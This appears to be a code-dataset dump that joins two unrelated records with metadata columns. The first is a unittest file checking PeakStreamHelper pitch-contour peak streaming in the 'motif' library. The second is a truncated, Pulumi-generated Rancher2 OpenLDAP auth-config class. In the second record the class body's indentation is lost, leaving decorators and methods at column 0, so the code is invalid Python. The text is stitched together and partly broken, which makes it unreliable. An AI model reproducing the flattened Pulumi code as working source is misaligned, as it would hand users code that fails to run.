py
|
Python
|
tests/contour_extractors/test_utils.py
|
yamathcy/motif
|
3f43568e59f0879fbab5ef278e9e687b7cac3dd6
|
[
"MIT"
] | 21
|
2016-08-22T22:00:49.000Z
|
2020-03-29T04:15:19.000Z
|
tests/contour_extractors/test_utils.py
|
yamathcy/motif
|
3f43568e59f0879fbab5ef278e9e687b7cac3dd6
|
[
"MIT"
] | 22
|
2016-08-28T01:07:08.000Z
|
2018-02-07T14:38:26.000Z
|
tests/contour_extractors/test_utils.py
|
yamathcy/motif
|
3f43568e59f0879fbab5ef278e9e687b7cac3dd6
|
[
"MIT"
] | 3
|
2017-01-12T10:04:27.000Z
|
2022-01-06T13:25:48.000Z
|
"""Tests for motif/contour_extractors/utils.py
"""
import unittest
import numpy as np
from motif.contour_extractors import utils
class TestPeakStreamHelper(unittest.TestCase):
    """Tests for utils.PeakStreamHelper on a small salience matrix with peaks.

    setUp builds a 5-bin x 3-frame salience matrix S; the remaining tests
    pin down every derived attribute and the peak-streaming methods against
    hand-computed expected values.
    """
    def setUp(self):
        # Salience matrix: rows are frequency bins, columns are time frames.
        self.S = np.array([
            [0, 0, 0],
            [1, 0, 5],
            [0, 0.002, 1],
            [0.1, 0, 0],
            [0, 0, 0]
        ])
        self.times = np.array([0.0, 0.5, 1.0])
        self.freqs = np.array([10., 100., 150., 200., 300.])
        self.amp_thresh = 0.9
        self.dev_thresh = 0.9
        self.n_gap = 3.234
        self.pitch_cont = 80
        self.psh = utils.PeakStreamHelper(
            self.S, self.times, self.freqs, self.amp_thresh, self.dev_thresh,
            self.n_gap, self.pitch_cont
        )
    def test_S(self):
        expected = np.array([
            [0, 0, 0],
            [1, 0, 5],
            [0, 0.002, 1],
            [0.1, 0, 0],
            [0, 0, 0]
        ])
        actual = self.psh.S
        self.assertTrue(np.allclose(expected, actual))
    def test_S_norm(self):
        # Each column is normalized by its own maximum.
        expected = np.array([
            [0, 0, 0],
            [1, 0, 1],
            [0, 1.0, 0.2],
            [0.1, 0, 0],
            [0, 0, 0]
        ])
        actual = self.psh.S_norm
        self.assertTrue(np.allclose(expected, actual))
    def test_times(self):
        expected = np.array([0.0, 0.5, 1.0])
        actual = self.psh.times
        self.assertTrue(np.allclose(expected, actual))
    def test_freqs(self):
        # Frequencies appear converted to a log/cents-like scale by the
        # helper — presumably cents relative to a reference; TODO confirm
        # against utils.PeakStreamHelper.
        expected = np.array([
            0., 3986.31371386, 4688.26871473, 5186.31371386, 5888.26871473
        ])
        actual = self.psh.freqs
        self.assertTrue(np.allclose(expected, actual))
    def test_amp_thresh(self):
        expected = 0.9
        actual = self.psh.amp_thresh
        self.assertEqual(expected, actual)
    def test_dev_thresh(self):
        expected = 0.9
        actual = self.psh.dev_thresh
        self.assertEqual(expected, actual)
    def test_n_gap(self):
        expected = 3.234
        actual = self.psh.n_gap
        self.assertEqual(expected, actual)
    def test_pitch_cont(self):
        expected = 80
        actual = self.psh.pitch_cont
        self.assertEqual(expected, actual)
    def test_n_peaks(self):
        expected = 4
        actual = self.psh.n_peaks
        self.assertEqual(expected, actual)
    def test_peak_index(self):
        expected = np.array([0, 1, 2, 3])
        actual = self.psh.peak_index
        self.assertTrue(np.allclose(expected, actual))
    def test_peak_time_index(self):
        expected = np.array([0, 2, 1, 0])
        actual = self.psh.peak_time_idx
        self.assertTrue(np.allclose(expected, actual))
    def test_first_peak_time_idx(self):
        expected = 0
        actual = self.psh.first_peak_time_idx
        self.assertEqual(expected, actual)
    def test_last_peak_time_idx(self):
        expected = 2
        actual = self.psh.last_peak_time_idx
        self.assertEqual(expected, actual)
    def test_frame_dict(self):
        # Maps time-frame index -> list of peak indices in that frame.
        expected = {
            0: [0, 3],
            1: [2],
            2: [1]
        }
        actual = self.psh.frame_dict
        self.assertEqual(expected.keys(), actual.keys())
        for k in actual.keys():
            self.assertTrue(np.allclose(expected[k], actual[k]))
    def test_peak_freqs(self):
        expected = np.array([
            3986.31371386, 3986.31371386, 4688.26871473, 5186.31371386
        ])
        actual = self.psh.peak_freqs
        self.assertTrue(np.allclose(expected, actual))
    def test_peak_amps(self):
        expected = np.array([1., 5., 0.002, 0.1])
        actual = self.psh.peak_amps
        self.assertTrue(np.allclose(expected, actual))
    def test_peak_amps_norm(self):
        expected = np.array([1., 1., 1., 0.1])
        actual = self.psh.peak_amps_norm
        self.assertTrue(np.allclose(expected, actual))
    def test_good_peaks(self):
        # "Good" peaks are those passing the thresholds; the rest are "bad".
        expected = set([0, 1])
        actual = self.psh.good_peaks
        self.assertEqual(expected, actual)
    def test_bad_peaks(self):
        expected = set([2, 3])
        actual = self.psh.bad_peaks
        self.assertEqual(expected, actual)
    def test_good_peaks_sorted(self):
        expected = np.array([1, 0])
        actual = self.psh.good_peaks_sorted
        self.assertTrue(np.allclose(expected, actual))
    def test_good_peaks_sorted_index(self):
        expected = {0: 1, 1: 0}
        actual = self.psh.good_peaks_sorted_index
        self.assertEqual(expected, actual)
    def test_good_peaks_sorted_avail(self):
        expected = np.array([True, True])
        actual = self.psh.good_peaks_sorted_avail
        self.assertTrue(np.allclose(expected, actual))
    def test_n_good_peaks(self):
        expected = 2
        actual = self.psh.n_good_peaks
        self.assertTrue(np.allclose(expected, actual))
    def test_smallest_good_peak_idx(self):
        expected = 0
        actual = self.psh.smallest_good_peak_idx
        self.assertEqual(expected, actual)
    def test_get_largest_peak(self):
        # Fresh helper with a 7-bin x 4-frame matrix for the method tests.
        S = np.array([
            [0, 0, 0, 0],
            [0, 0.002, 0, 0],
            [1, 0, 5, 0],
            [0, 0.3, 0.1, 0],
            [0.1, 0, 0.2, 0],
            [0, 0.5, 0, 0.2],
            [0, 0, 0, 0]
        ])
        times = np.array([0.05, 0.1, 0.15, 0.2])
        freqs = np.array([97.0, 100.0, 103.0, 105.0, 107.0, 109.0, 112.0])
        psh = utils.PeakStreamHelper(S, times, freqs, 0.9, 0.9, 3.456, 80)
        actual = psh.get_largest_peak()
        expected = 2
        self.assertEqual(expected, actual)
    def test_update_largest_peak_list(self):
        S = np.array([
            [0, 0, 0, 0],
            [0, 0.002, 0, 0],
            [1, 0, 5, 0],
            [0, 0.3, 0.1, 0],
            [0.1, 0, 0.2, 0],
            [0, 0.5, 0, 0.2],
            [0, 0, 0, 0]
        ])
        times = np.array([0.05, 0.1, 0.15, 0.2])
        freqs = np.array([97.0, 100.0, 103.0, 105.0, 107.0, 109.0, 112.0])
        psh = utils.PeakStreamHelper(S, times, freqs, 0.9, 0.9, 3.456, 80)
        # Initially all good peaks are available.
        expected_avail = np.array([True, True, True, True])
        actual_avail = psh.good_peaks_sorted_avail
        self.assertTrue(np.allclose(expected_avail, actual_avail))
        expected_smallest_idx = 0
        actual_smallest_idx = psh.smallest_good_peak_idx
        self.assertEqual(expected_smallest_idx, actual_smallest_idx)
        # Consuming peak 1 marks it unavailable but doesn't move the pointer.
        psh.update_largest_peak_list(1)
        expected_avail = np.array([True, False, True, True])
        actual_avail = psh.good_peaks_sorted_avail
        self.assertTrue(np.allclose(expected_avail, actual_avail))
        expected_smallest_idx = 0
        actual_smallest_idx = psh.smallest_good_peak_idx
        self.assertEqual(expected_smallest_idx, actual_smallest_idx)
        # Consuming peak 2 advances the smallest-available pointer past 0 and 1.
        psh.update_largest_peak_list(2)
        expected_avail = np.array([False, False, True, True])
        actual_avail = psh.good_peaks_sorted_avail
        self.assertTrue(np.allclose(expected_avail, actual_avail))
        expected_smallest_idx = 2
        actual_smallest_idx = psh.smallest_good_peak_idx
        self.assertEqual(expected_smallest_idx, actual_smallest_idx)
    def test_get_closest_peak(self):
        S = np.array([
            [0, 0, 0, 0],
            [0, 0.002, 0, 0],
            [1, 0, 5, 0],
            [0, 0.3, 0.1, 0],
            [0.1, 0, 0.2, 0],
            [0, 0.5, 0, 0.2],
            [0, 0, 0, 0]
        ])
        times = np.array([0.05, 0.1, 0.15, 0.2])
        freqs = np.array([97.0, 100.0, 103.0, 105.0, 107.0, 109.0, 112.0])
        psh = utils.PeakStreamHelper(S, times, freqs, 0.9, 0.9, 3.456, 80)
        actual = psh.get_closest_peak(237.2, [2, 4, 5])
        expected = 2
        self.assertEqual(expected, actual)
    def test_get_peak_candidates(self):
        S = np.array([
            [0, 0, 0, 0],
            [0, 0.002, 0, 0],
            [1, 0, 5, 0],
            [0, 0.3, 0.1, 0],
            [0.1, 0, 0.2, 0],
            [0, 0.5, 0, 0.2],
            [0, 0, 0, 0]
        ])
        times = np.array([0.05, 0.1, 0.15, 0.2])
        freqs = np.array([97.0, 100.0, 103.0, 105.0, 107.0, 109.0, 112.0])
        psh = utils.PeakStreamHelper(S, times, freqs, 0.9, 0.9, 3.456, 80)
        frame_idx = 0
        f0_val = 4000.0
        # Candidates come from the good-peak set here.
        expected_cands = [1]
        expected_from_good = True
        actual_cands, actual_from_good = psh.get_peak_candidates(
            frame_idx, f0_val
        )
        self.assertEqual(expected_cands, actual_cands)
        self.assertEqual(expected_from_good, actual_from_good)
    def test_get_peak_candidates2(self):
        S = np.array([
            [0, 0, 0, 0],
            [0, 0.002, 0, 0],
            [1, 0, 5, 0],
            [0, 0.3, 0.1, 0],
            [0.1, 0, 0.2, 0],
            [0, 0.5, 0, 0.002],
            [0, 0, 0, 0]
        ])
        times = np.array([0.05, 0.1, 0.15, 0.2])
        freqs = np.array([97.0, 100.0, 103.0, 105.0, 107.0, 109.0, 112.0])
        psh = utils.PeakStreamHelper(S, times, freqs, 0.9, 0.9, 3.456, 80)
        frame_idx = 3
        f0_val = 4125.5
        # Candidates fall back to the bad-peak set here.
        expected_cands = [7]
        expected_from_good = False
        actual_cands, actual_from_good = psh.get_peak_candidates(
            frame_idx, f0_val
        )
        self.assertEqual(expected_cands, actual_cands)
        self.assertEqual(expected_from_good, actual_from_good)
    def test_get_peak_candidates3(self):
        S = np.array([
            [0, 0, 0, 0],
            [0, 0.002, 0, 0],
            [1, 0, 5, 0],
            [0, 0.3, 0.1, 0],
            [0.1, 0, 0.2, 0],
            [0, 0.5, 0, 0.002],
            [0, 0, 0, 0]
        ])
        times = np.array([0.05, 0.1, 0.15, 0.2])
        freqs = np.array([97.0, 100.0, 103.0, 105.0, 107.0, 109.0, 112.0])
        psh = utils.PeakStreamHelper(S, times, freqs, 0.9, 0.9, 3.456, 80)
        frame_idx = 3
        f0_val = 0
        # A zero f0 yields no candidates at all.
        expected_cands = None
        expected_from_good = None
        actual_cands, actual_from_good = psh.get_peak_candidates(
            frame_idx, f0_val
        )
        self.assertEqual(expected_cands, actual_cands)
        self.assertEqual(expected_from_good, actual_from_good)
    def test_get_contour(self):
        S = np.array([
            [0, 0, 0, 0],
            [0, 0.002, 0, 0],
            [1, 0, 5, 0],
            [0, 0.3, 0.1, 0],
            [0.1, 0, 0.2, 0],
            [0, 0.5, 0, 0.002],
            [0, 0, 0, 0]
        ])
        times = np.array([0.05, 0.1, 0.15, 0.2])
        freqs = np.array([97.0, 100.0, 103.0, 105.0, 107.0, 109.0, 112.0])
        psh = utils.PeakStreamHelper(S, times, freqs, 0.9, 0.9, 3.456, 80)
        # First call extracts one contour of length 3.
        psh.get_contour()
        actual_contour_idx = psh.contour_idx
        expected_contour_idx = [2, 3, 1]
        self.assertEqual(expected_contour_idx, actual_contour_idx)
        actual_c_len = psh.c_len
        expected_c_len = [3]
        self.assertEqual(expected_c_len, actual_c_len)
        # Second call appends a second contour of length 4.
        psh.get_contour()
        actual_contour_idx = psh.contour_idx
        expected_contour_idx = [2, 3, 1, 6, 5, 7, 4]
        self.assertEqual(expected_contour_idx, actual_contour_idx)
        actual_c_len = psh.c_len
        expected_c_len = [3, 4]
        self.assertEqual(expected_c_len, actual_c_len)
    def test_peak_streaming(self):
        S = np.array([
            [0, 0, 0, 0],
            [0, 0.002, 0, 0],
            [1, 0, 5, 0],
            [0, 0.3, 0.1, 0],
            [0.1, 0, 0.2, 0],
            [0, 0.5, 0, 0.2],
            [0, 0, 0, 0]
        ])
        times = np.array([0.05, 0.1, 0.15, 0.2])
        freqs = np.array([97.0, 100.0, 103.0, 105.0, 107.0, 109.0, 112.0])
        psh = utils.PeakStreamHelper(S, times, freqs, 0.9, 0.9, 3.456, 80)
        # Full pipeline output: contour numbers, times, freqs, saliences.
        expected_c_numbers = np.array([0, 0, 0, 1, 1, 1, 1])
        expected_c_times = np.array([0.15, 0.1, 0.05, 0.1, 0.15, 0.2, 0.05])
        expected_c_freqs = np.array([103., 105., 103., 109., 107., 109., 107.])
        expected_c_sal = np.array([5, 0.3, 1.0, 0.5, 0.2, 0.2, 0.1])
        (actual_c_numbers,
         actual_c_times,
         actual_c_freqs,
         actual_c_sal) = psh.peak_streaming()
        self.assertTrue(np.allclose(expected_c_numbers, actual_c_numbers))
        self.assertTrue(np.allclose(expected_c_times, actual_c_times))
        self.assertTrue(np.allclose(expected_c_freqs, actual_c_freqs))
        self.assertTrue(np.allclose(expected_c_sal, actual_c_sal))
class TestPeakStreamHelperNoPeaks(unittest.TestCase):
    """Tests for utils.PeakStreamHelper on a salience matrix with no peaks.

    The matrix is monotone within every column, so no local peak exists and
    all peak-derived attributes should be empty / None / zero.
    """
    def setUp(self):
        # Columns contain no local maxima interior to the frequency axis.
        self.S = np.array([
            [0., 0., 0.],
            [1., 0., 1.],
            [2., 0., 1.],
            [3., 0., 1.],
            [4., 0., 1.]
        ])
        self.times = np.array([0.0, 0.5, 1.0])
        self.freqs = np.array([10., 100., 150., 200., 300.])
        self.amp_thresh = 0.9
        self.dev_thresh = 0.9
        self.n_gap = 3.234
        self.pitch_cont = 80
        self.psh = utils.PeakStreamHelper(
            self.S, self.times, self.freqs, self.amp_thresh, self.dev_thresh,
            self.n_gap, self.pitch_cont
        )
    def test_S(self):
        expected = np.array([
            [0., 0., 0.],
            [1., 0., 1.],
            [2., 0., 1.],
            [3., 0., 1.],
            [4., 0., 1.]
        ])
        actual = self.psh.S
        self.assertTrue(np.allclose(expected, actual))
    def test_S_norm(self):
        # Column-wise normalization by each column's maximum.
        expected = np.array([
            [0, 0, 0],
            [0.25, 0, 1],
            [0.5, 0, 1],
            [0.75, 0, 1],
            [1, 0, 1]
        ])
        actual = self.psh.S_norm
        self.assertTrue(np.allclose(expected, actual))
    def test_times(self):
        expected = np.array([0.0, 0.5, 1.0])
        actual = self.psh.times
        self.assertTrue(np.allclose(expected, actual))
    def test_freqs(self):
        # Same converted-frequency values as in TestPeakStreamHelper.
        expected = np.array([
            0., 3986.31371386, 4688.26871473, 5186.31371386, 5888.26871473
        ])
        actual = self.psh.freqs
        self.assertTrue(np.allclose(expected, actual))
    def test_amp_thresh(self):
        expected = 0.9
        actual = self.psh.amp_thresh
        self.assertEqual(expected, actual)
    def test_dev_thresh(self):
        expected = 0.9
        actual = self.psh.dev_thresh
        self.assertEqual(expected, actual)
    def test_n_gap(self):
        expected = 3.234
        actual = self.psh.n_gap
        self.assertEqual(expected, actual)
    def test_pitch_cont(self):
        expected = 80
        actual = self.psh.pitch_cont
        self.assertEqual(expected, actual)
    def test_n_peaks(self):
        expected = 0
        actual = self.psh.n_peaks
        self.assertEqual(expected, actual)
    def test_peak_index(self):
        expected = np.array([])
        actual = self.psh.peak_index
        self.assertTrue(np.allclose(expected, actual))
    def test_peak_time_index(self):
        expected = np.array([])
        actual = self.psh.peak_time_idx
        self.assertTrue(np.allclose(expected, actual))
    def test_first_peak_time_idx(self):
        expected = None
        actual = self.psh.first_peak_time_idx
        self.assertEqual(expected, actual)
    def test_last_peak_time_idx(self):
        expected = None
        actual = self.psh.last_peak_time_idx
        self.assertEqual(expected, actual)
    def test_frame_dict(self):
        expected = {}
        actual = self.psh.frame_dict
        self.assertEqual(expected, actual)
    def test_peak_freqs(self):
        expected = np.array([])
        actual = self.psh.peak_freqs
        self.assertTrue(np.allclose(expected, actual))
    def test_peak_amps(self):
        expected = np.array([])
        actual = self.psh.peak_amps
        self.assertTrue(np.allclose(expected, actual))
    def test_peak_amps_norm(self):
        expected = np.array([])
        actual = self.psh.peak_amps_norm
        self.assertTrue(np.allclose(expected, actual))
    def test_good_peaks(self):
        expected = set()
        actual = self.psh.good_peaks
        self.assertEqual(expected, actual)
    def test_bad_peaks(self):
        expected = set()
        actual = self.psh.bad_peaks
        self.assertEqual(expected, actual)
    def test_good_peaks_sorted(self):
        expected = np.array([])
        actual = self.psh.good_peaks_sorted
        self.assertTrue(np.allclose(expected, actual))
    def test_good_peaks_sorted_index(self):
        expected = {}
        actual = self.psh.good_peaks_sorted_index
        self.assertEqual(expected, actual)
    def test_good_peaks_sorted_avail(self):
        expected = np.array([])
        actual = self.psh.good_peaks_sorted_avail
        self.assertTrue(np.allclose(expected, actual))
    def test_n_good_peaks(self):
        expected = 0
        actual = self.psh.n_good_peaks
        self.assertTrue(np.allclose(expected, actual))
    def test_smallest_good_peak_idx(self):
        expected = 0
        actual = self.psh.smallest_good_peak_idx
        self.assertEqual(expected, actual)
| 31.565056
| 79
| 0.554469
| 2,408
| 16,982
| 3.736711
| 0.047757
| 0.037342
| 0.02834
| 0.112025
| 0.91387
| 0.904201
| 0.882085
| 0.878751
| 0.840965
| 0.840076
| 0
| 0.100512
| 0.309858
| 16,982
| 537
| 80
| 31.623836
| 0.667235
| 0.002532
| 0
| 0.829646
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.15708
| 1
| 0.128319
| false
| 0
| 0.006637
| 0
| 0.139381
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6caf177be60f963a1d158636a23493e44c9f3170
| 74,516
|
py
|
Python
|
sdk/python/pulumi_rancher2/auth_config_open_ldap.py
|
pulumi/pulumi-rancher2
|
7a98af8cf598b711084a7f46c0fe71b43ed7a8ac
|
[
"ECL-2.0",
"Apache-2.0"
] | 3
|
2020-03-23T15:59:11.000Z
|
2021-01-29T00:37:32.000Z
|
sdk/python/pulumi_rancher2/auth_config_open_ldap.py
|
pulumi/pulumi-rancher2
|
7a98af8cf598b711084a7f46c0fe71b43ed7a8ac
|
[
"ECL-2.0",
"Apache-2.0"
] | 76
|
2020-01-16T20:00:25.000Z
|
2022-03-31T20:30:08.000Z
|
sdk/python/pulumi_rancher2/auth_config_open_ldap.py
|
pulumi/pulumi-rancher2
|
7a98af8cf598b711084a7f46c0fe71b43ed7a8ac
|
[
"ECL-2.0",
"Apache-2.0"
] | 2
|
2020-03-27T17:39:59.000Z
|
2020-11-24T23:09:24.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
__all__ = ['AuthConfigOpenLdapArgs', 'AuthConfigOpenLdap']
@pulumi.input_type
class AuthConfigOpenLdapArgs:
def __init__(__self__, *,
servers: pulumi.Input[Sequence[pulumi.Input[str]]],
service_account_distinguished_name: pulumi.Input[str],
service_account_password: pulumi.Input[str],
test_password: pulumi.Input[str],
test_username: pulumi.Input[str],
user_search_base: pulumi.Input[str],
access_mode: Optional[pulumi.Input[str]] = None,
allowed_principal_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
annotations: Optional[pulumi.Input[Mapping[str, Any]]] = None,
certificate: Optional[pulumi.Input[str]] = None,
connection_timeout: Optional[pulumi.Input[int]] = None,
enabled: Optional[pulumi.Input[bool]] = None,
group_dn_attribute: Optional[pulumi.Input[str]] = None,
group_member_mapping_attribute: Optional[pulumi.Input[str]] = None,
group_member_user_attribute: Optional[pulumi.Input[str]] = None,
group_name_attribute: Optional[pulumi.Input[str]] = None,
group_object_class: Optional[pulumi.Input[str]] = None,
group_search_attribute: Optional[pulumi.Input[str]] = None,
group_search_base: Optional[pulumi.Input[str]] = None,
labels: Optional[pulumi.Input[Mapping[str, Any]]] = None,
nested_group_membership_enabled: Optional[pulumi.Input[bool]] = None,
port: Optional[pulumi.Input[int]] = None,
tls: Optional[pulumi.Input[bool]] = None,
user_disabled_bit_mask: Optional[pulumi.Input[int]] = None,
user_enabled_attribute: Optional[pulumi.Input[str]] = None,
user_login_attribute: Optional[pulumi.Input[str]] = None,
user_member_attribute: Optional[pulumi.Input[str]] = None,
user_name_attribute: Optional[pulumi.Input[str]] = None,
user_object_class: Optional[pulumi.Input[str]] = None,
user_search_attribute: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a AuthConfigOpenLdap resource.
:param pulumi.Input[Sequence[pulumi.Input[str]]] servers: OpenLdap servers list (list)
:param pulumi.Input[str] service_account_distinguished_name: Service account DN for access OpenLdap service (string)
:param pulumi.Input[str] service_account_password: Service account password for access OpenLdap service (string)
:param pulumi.Input[str] test_password: Password for test access to OpenLdap service (string)
:param pulumi.Input[str] test_username: Username for test access to OpenLdap service (string)
:param pulumi.Input[str] user_search_base: User search base DN (string)
:param pulumi.Input[str] access_mode: Access mode for auth. `required`, `restricted`, `unrestricted` are supported. Default `unrestricted` (string)
:param pulumi.Input[Sequence[pulumi.Input[str]]] allowed_principal_ids: Allowed principal ids for auth. Required if `access_mode` is `required` or `restricted`. Ex: `openldap_user://<DN>` `openldap_group://<DN>` (list)
:param pulumi.Input[Mapping[str, Any]] annotations: Annotations of the resource (map)
:param pulumi.Input[str] certificate: Base64 encoded CA certificate for TLS if self-signed. Use filebase64(<FILE>) for encoding file (string)
:param pulumi.Input[int] connection_timeout: OpenLdap connection timeout. Default `5000` (int)
:param pulumi.Input[bool] enabled: Enable auth config provider. Default `true` (bool)
:param pulumi.Input[str] group_dn_attribute: Group DN attribute. Default `entryDN` (string)
:param pulumi.Input[str] group_member_mapping_attribute: Group member mapping attribute. Default `member` (string)
:param pulumi.Input[str] group_member_user_attribute: Group member user attribute. Default `entryDN` (string)
:param pulumi.Input[str] group_name_attribute: Group name attribute. Default `cn` (string)
:param pulumi.Input[str] group_object_class: Group object class. Default `groupOfNames` (string)
:param pulumi.Input[str] group_search_attribute: Group search attribute. Default `cn` (string)
:param pulumi.Input[str] group_search_base: Group search base (string)
:param pulumi.Input[Mapping[str, Any]] labels: Labels of the resource (map)
:param pulumi.Input[bool] nested_group_membership_enabled: Nested group membership enable. Default `false` (bool)
:param pulumi.Input[int] port: OpenLdap port. Default `389` (int)
:param pulumi.Input[bool] tls: Enable TLS connection (bool)
:param pulumi.Input[int] user_disabled_bit_mask: User disabled bit mask (int)
:param pulumi.Input[str] user_enabled_attribute: User enable attribute (string)
:param pulumi.Input[str] user_login_attribute: User login attribute. Default `uid` (string)
:param pulumi.Input[str] user_member_attribute: User member attribute. Default `memberOf` (string)
:param pulumi.Input[str] user_name_attribute: User name attribute. Default `givenName` (string)
:param pulumi.Input[str] user_object_class: User object class. Default `inetorgperson` (string)
:param pulumi.Input[str] user_search_attribute: User search attribute. Default `uid|sn|givenName` (string)
"""
pulumi.set(__self__, "servers", servers)
pulumi.set(__self__, "service_account_distinguished_name", service_account_distinguished_name)
pulumi.set(__self__, "service_account_password", service_account_password)
pulumi.set(__self__, "test_password", test_password)
pulumi.set(__self__, "test_username", test_username)
pulumi.set(__self__, "user_search_base", user_search_base)
if access_mode is not None:
pulumi.set(__self__, "access_mode", access_mode)
if allowed_principal_ids is not None:
pulumi.set(__self__, "allowed_principal_ids", allowed_principal_ids)
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if certificate is not None:
pulumi.set(__self__, "certificate", certificate)
if connection_timeout is not None:
pulumi.set(__self__, "connection_timeout", connection_timeout)
if enabled is not None:
pulumi.set(__self__, "enabled", enabled)
if group_dn_attribute is not None:
pulumi.set(__self__, "group_dn_attribute", group_dn_attribute)
if group_member_mapping_attribute is not None:
pulumi.set(__self__, "group_member_mapping_attribute", group_member_mapping_attribute)
if group_member_user_attribute is not None:
pulumi.set(__self__, "group_member_user_attribute", group_member_user_attribute)
if group_name_attribute is not None:
pulumi.set(__self__, "group_name_attribute", group_name_attribute)
if group_object_class is not None:
pulumi.set(__self__, "group_object_class", group_object_class)
if group_search_attribute is not None:
pulumi.set(__self__, "group_search_attribute", group_search_attribute)
if group_search_base is not None:
pulumi.set(__self__, "group_search_base", group_search_base)
if labels is not None:
pulumi.set(__self__, "labels", labels)
if nested_group_membership_enabled is not None:
pulumi.set(__self__, "nested_group_membership_enabled", nested_group_membership_enabled)
if port is not None:
pulumi.set(__self__, "port", port)
if tls is not None:
pulumi.set(__self__, "tls", tls)
if user_disabled_bit_mask is not None:
pulumi.set(__self__, "user_disabled_bit_mask", user_disabled_bit_mask)
if user_enabled_attribute is not None:
pulumi.set(__self__, "user_enabled_attribute", user_enabled_attribute)
if user_login_attribute is not None:
pulumi.set(__self__, "user_login_attribute", user_login_attribute)
if user_member_attribute is not None:
pulumi.set(__self__, "user_member_attribute", user_member_attribute)
if user_name_attribute is not None:
pulumi.set(__self__, "user_name_attribute", user_name_attribute)
if user_object_class is not None:
pulumi.set(__self__, "user_object_class", user_object_class)
if user_search_attribute is not None:
pulumi.set(__self__, "user_search_attribute", user_search_attribute)
@property
@pulumi.getter
def servers(self) -> pulumi.Input[Sequence[pulumi.Input[str]]]:
"""
OpenLdap servers list (list)
"""
return pulumi.get(self, "servers")
@servers.setter
def servers(self, value: pulumi.Input[Sequence[pulumi.Input[str]]]):
pulumi.set(self, "servers", value)
@property
@pulumi.getter(name="serviceAccountDistinguishedName")
def service_account_distinguished_name(self) -> pulumi.Input[str]:
"""
Service account DN for access OpenLdap service (string)
"""
return pulumi.get(self, "service_account_distinguished_name")
@service_account_distinguished_name.setter
def service_account_distinguished_name(self, value: pulumi.Input[str]):
pulumi.set(self, "service_account_distinguished_name", value)
@property
@pulumi.getter(name="serviceAccountPassword")
def service_account_password(self) -> pulumi.Input[str]:
"""
Service account password for access OpenLdap service (string)
"""
return pulumi.get(self, "service_account_password")
@service_account_password.setter
def service_account_password(self, value: pulumi.Input[str]):
pulumi.set(self, "service_account_password", value)
@property
@pulumi.getter(name="testPassword")
def test_password(self) -> pulumi.Input[str]:
"""
Password for test access to OpenLdap service (string)
"""
return pulumi.get(self, "test_password")
@test_password.setter
def test_password(self, value: pulumi.Input[str]):
pulumi.set(self, "test_password", value)
@property
@pulumi.getter(name="testUsername")
def test_username(self) -> pulumi.Input[str]:
"""
Username for test access to OpenLdap service (string)
"""
return pulumi.get(self, "test_username")
@test_username.setter
def test_username(self, value: pulumi.Input[str]):
pulumi.set(self, "test_username", value)
@property
@pulumi.getter(name="userSearchBase")
def user_search_base(self) -> pulumi.Input[str]:
"""
User search base DN (string)
"""
return pulumi.get(self, "user_search_base")
@user_search_base.setter
def user_search_base(self, value: pulumi.Input[str]):
pulumi.set(self, "user_search_base", value)
@property
@pulumi.getter(name="accessMode")
def access_mode(self) -> Optional[pulumi.Input[str]]:
"""
Access mode for auth. `required`, `restricted`, `unrestricted` are supported. Default `unrestricted` (string)
"""
return pulumi.get(self, "access_mode")
@access_mode.setter
def access_mode(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "access_mode", value)
# Optional input; provider key "allowedPrincipalIds".
@property
@pulumi.getter(name="allowedPrincipalIds")
def allowed_principal_ids(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
    """
    Allowed principal ids for auth. Required if `access_mode` is `required` or `restricted`. Ex: `openldap_user://<DN>` `openldap_group://<DN>` (list)
    """
    return pulumi.get(self, "allowed_principal_ids")

@allowed_principal_ids.setter
def allowed_principal_ids(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
    pulumi.set(self, "allowed_principal_ids", value)
# Optional input; provider key matches the attribute name.
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
    """
    Annotations of the resource (map)
    """
    return pulumi.get(self, "annotations")

@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
    pulumi.set(self, "annotations", value)
# Optional input; provider key matches the attribute name.
@property
@pulumi.getter
def certificate(self) -> Optional[pulumi.Input[str]]:
    """
    Base64 encoded CA certificate for TLS if self-signed. Use filebase64(<FILE>) for encoding file (string)
    """
    return pulumi.get(self, "certificate")

@certificate.setter
def certificate(self, value: Optional[pulumi.Input[str]]):
    pulumi.set(self, "certificate", value)
# Optional input; provider key "connectionTimeout".
@property
@pulumi.getter(name="connectionTimeout")
def connection_timeout(self) -> Optional[pulumi.Input[int]]:
    """
    OpenLdap connection timeout. Default `5000` (int)
    """
    return pulumi.get(self, "connection_timeout")

@connection_timeout.setter
def connection_timeout(self, value: Optional[pulumi.Input[int]]):
    pulumi.set(self, "connection_timeout", value)
# Optional input; provider key matches the attribute name.
@property
@pulumi.getter
def enabled(self) -> Optional[pulumi.Input[bool]]:
    """
    Enable auth config provider. Default `true` (bool)
    """
    return pulumi.get(self, "enabled")

@enabled.setter
def enabled(self, value: Optional[pulumi.Input[bool]]):
    pulumi.set(self, "enabled", value)
# Optional input; provider key "groupDnAttribute".
@property
@pulumi.getter(name="groupDnAttribute")
def group_dn_attribute(self) -> Optional[pulumi.Input[str]]:
    """
    Group DN attribute. Default `entryDN` (string)
    """
    return pulumi.get(self, "group_dn_attribute")

@group_dn_attribute.setter
def group_dn_attribute(self, value: Optional[pulumi.Input[str]]):
    pulumi.set(self, "group_dn_attribute", value)
# Optional input; provider key "groupMemberMappingAttribute".
@property
@pulumi.getter(name="groupMemberMappingAttribute")
def group_member_mapping_attribute(self) -> Optional[pulumi.Input[str]]:
    """
    Group member mapping attribute. Default `member` (string)
    """
